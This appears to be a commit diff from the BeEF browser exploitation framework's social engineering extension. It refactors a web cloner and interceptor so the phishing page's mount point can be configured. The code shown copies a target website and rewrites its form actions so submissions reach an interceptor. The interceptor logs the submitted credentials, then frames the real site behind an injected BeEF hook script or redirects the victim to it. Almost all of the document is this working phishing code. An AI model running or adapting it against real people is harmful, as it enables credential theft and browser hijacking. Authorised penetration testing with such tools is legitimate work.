Social Eng. extension: mount point for phishing page is not configurable, refactored Interceptor initialization using config settings

extensions/social_engineering/web_cloner/interceptor.rb

@@ -16,25 +16,21 @@
 module BeEF
   module Extension
     module SocialEngineering
-
+      require 'sinatra/base'
       class Interceptor < Sinatra::Base
 
-      def initialize(file_path, redirect_to, frameable, beef_hook)
-        super self
-        file = File.open(file_path,'r')
-        @cloned_page = file.read
-        @redirect_to = redirect_to
-        @frameable = frameable
-        @beef_hook = beef_hook
-        file.close
-        print_info "Cloned page with content from [cloned_pages/#{File.basename(file_path)}] initialized."
+      configure do
+          set :show_exceptions, false
       end
 
       # intercept GET
       get "/" do
         print_info "GET request"
         print_info "Referer: #{request.referer}"
-        @cloned_page
+        file = File.open(settings.file_path,'r')
+        cloned_page = file.read
+        file.close
+        cloned_page
       end
 
       # intercept POST
@@ -45,12 +41,12 @@ module BeEF
         print_info "Intercepted data:"
         print_info data
 
-        if @frameable
+        if settings.frameable
           print_info "Page can be framed :-) Loading original URL into iFrame..."
-          "<html><head><script type=\"text/javascript\" src=\"#{@beef_hook}\"></script>\n</head></head><body><iframe src=\"#{@redirect_to}\" style=\"border:none; background-color:white; width:100%; height:100%; position:absolute; top:0px; left:0px; padding:0px; margin:0px\"></iframe></body></html>"
+          "<html><head><script type=\"text/javascript\" src=\"#{settings.beef_hook}\"></script>\n</head></head><body><iframe src=\"#{settings.redirect_to}\" style=\"border:none; background-color:white; width:100%; height:100%; position:absolute; top:0px; left:0px; padding:0px; margin:0px\"></iframe></body></html>"
         else
           print_info "Page can not be framed :-) Redirecting to original URL..."
-          redirect @redirect_to
+          redirect settings.redirect_to
         end
       end
       end

extensions/social_engineering/web_cloner/web_cloner.rb

@@ -27,7 +27,7 @@ module BeEF
           @beef_hook = "http://#{@config.get('beef.http.host')}:#{@config.get('beef.http.port')}#{@config.get('beef.http.hook_file')}"
         end
 
-        def clone_page(url)
+        def clone_page(url, mount)
           print_info "Cloning page at URL #{url}"
           uri = URI(url)
           output = uri.host
@@ -53,7 +53,7 @@ module BeEF
                   end
                   count += 1
                 end
-                line_attrs[count] = "action=\"/#{output}\""
+                line_attrs[count] = "action=\"#{mount}\""
                 mod_form = line_attrs.join(" ")
                 print_info "Form action value changed to / in order to be intercepted."
                 out_file.print mod_form
@@ -72,8 +72,15 @@ module BeEF
 
           # Check if the original URL can be framed
           frameable = is_frameable(url)
-          @http_server.mount("/#{output}", BeEF::Extension::SocialEngineering::Interceptor.new(file_path, url, frameable, @beef_hook))
-          print_info "Mounting cloned page on URL [/#{output}]"
+
+          interceptor = BeEF::Extension::SocialEngineering::Interceptor
+          interceptor.set :file_path, file_path
+          interceptor.set :redirect_to, url
+          interceptor.set :frameable, frameable
+          interceptor.set :beef_hook, @beef_hook
+
+          @http_server.mount("#{mount}", interceptor.new)
+          print_info "Mounting cloned page on URL [#{mount}]"
           @http_server.remap
         end